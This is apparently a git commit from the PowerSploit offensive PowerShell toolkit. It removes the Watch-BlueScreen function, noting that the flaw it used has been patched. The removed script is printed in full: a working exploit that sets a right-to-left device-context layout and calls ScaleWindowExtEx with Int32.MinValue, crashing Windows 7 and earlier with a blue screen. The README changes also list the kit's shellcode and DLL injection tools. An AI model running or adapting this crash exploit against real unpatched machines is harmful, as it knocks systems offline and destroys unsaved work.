Removing Watch-BlueScreen

This vulnerability was patched a while ago making this function largely irrelevant.
2014-06-19 20:16:26 -04:00 · 2014-06-19 20:16:26 -04:00 · 80ffa19fa3
parent 3444a0700e
commit 80ffa19fa3
3 changed files with 1 additions and 83 deletions
--- a/CodeExecution/CodeExecution.psd1
+++ b/CodeExecution/CodeExecution.psd1
@ -74,7 +74,7 @@ ModuleList = @(@{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID =
 # List of all files packaged with this module
 FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1', 
-               'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Watch-BlueScreen.ps1', 'Usage.md'
+               'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Usage.md'
 # Private data to pass to the module specified in RootModule/ModuleToProcess
 # PrivateData = ''
--- a/CodeExecution/Watch-BlueScreen.ps1
+++ b/CodeExecution/Watch-BlueScreen.ps1
@ -1,78 +0,0 @@
 function Watch-BlueScreen
 {
 <#
 .SYNOPSIS
    Cause a blue screen to occur (Windows 7 and below).
    PowerSploit Function: Watch-BlueScreen
    Author: Matthew Graeber (@mattifestation)
    Original Research: Tavis Ormandy and Nikita Tarakanov
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None
 .NOTES
    Tavis Ormandy documented this technique on 2/3/2013 and Nikita Tarakanov
    ?tweeted this technique on 5/13/2013.
 .LINK
    https://gist.github.com/taviso/4658638
    http://blog.cmpxchg8b.com/2013/02/the-other-integer-overflow.html
    https://twitter.com/NTarakanov/status/334031968465453057
 #>
    [CmdletBinding( ConfirmImpact = 'High')] Param ()
    try { $Gdi32 = [Gdi32] } catch [Management.Automation.RuntimeException]
    {
        $DynAssembly = New-Object System.Reflection.AssemblyName('BSOD')
        $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, 'Run')
        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BSOD', $False)
        $TypeBuilder = $ModuleBuilder.DefineType('Gdi32', 'Public, Class')
        $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
        $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
        $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder( $DllImportConstructor, @('ntdll.dll'),
                                                                                          [Reflection.FieldInfo[]]@($SetLastError), @($true))
        $TypeBuilder.DefinePInvokeMethod( 'CreateCompatibleDC',
                                          'Gdi32.dll',
                                          'Public, Static',
                                          'Standard',
                                          [IntPtr],
                                          @([IntPtr]),
                                          'Winapi',
                                          'Auto' ).SetCustomAttribute($SetLastErrorCustomAttribute)
        $TypeBuilder.DefinePInvokeMethod( 'SetLayout',
                                          'Gdi32.dll',
                                          'Public, Static',
                                          'Standard',
                                          [UInt32],
                                          @([IntPtr], [UInt32]),
                                          'Winapi',
                                          'Auto' ) | Out-Null
        $TypeBuilder.DefinePInvokeMethod( 'ScaleWindowExtEx',
                                          'Gdi32.dll',
                                          'Public, Static',
                                          'Standard',
                                          [Bool],
                                          @([IntPtr], [Int32], [Int32], [Int32], [Int32], [IntPtr]),
                                          'Winapi',
                                          'Auto' ) | Out-Null
        $Gdi32 = $TypeBuilder.CreateType()
    }
    $LAYOUT_RTL = 1
    if ($psCmdlet.ShouldContinue( 'Do you want to continue?', 'You may want to save your work before continuing.' ))
    {
        $DC = $Gdi32::CreateCompatibleDC([IntPtr]::Zero)
        $Gdi32::SetLayout($DC, $LAYOUT_RTL) | Out-Null
        $Gdi32::ScaleWindowExtEx($DC, [Int32]::MinValue, -1, 1, 1, [IntPtr]::Zero) | Out-Null
    }
 }
--- a/README.md
+++ b/README.md
@ -20,10 +20,6 @@ Injects shellcode into the process ID of your choosing or within PowerShell loca
 Execute shellcode within the context of the running PowerShell process without making any Win32 function calls.
 #### `Watch-BlueScreen`
 Cause a blue screen to occur (Windows 7 and below).
 ## ScriptModification
 **Modify and/or prepare scripts for execution on a compromised machine.**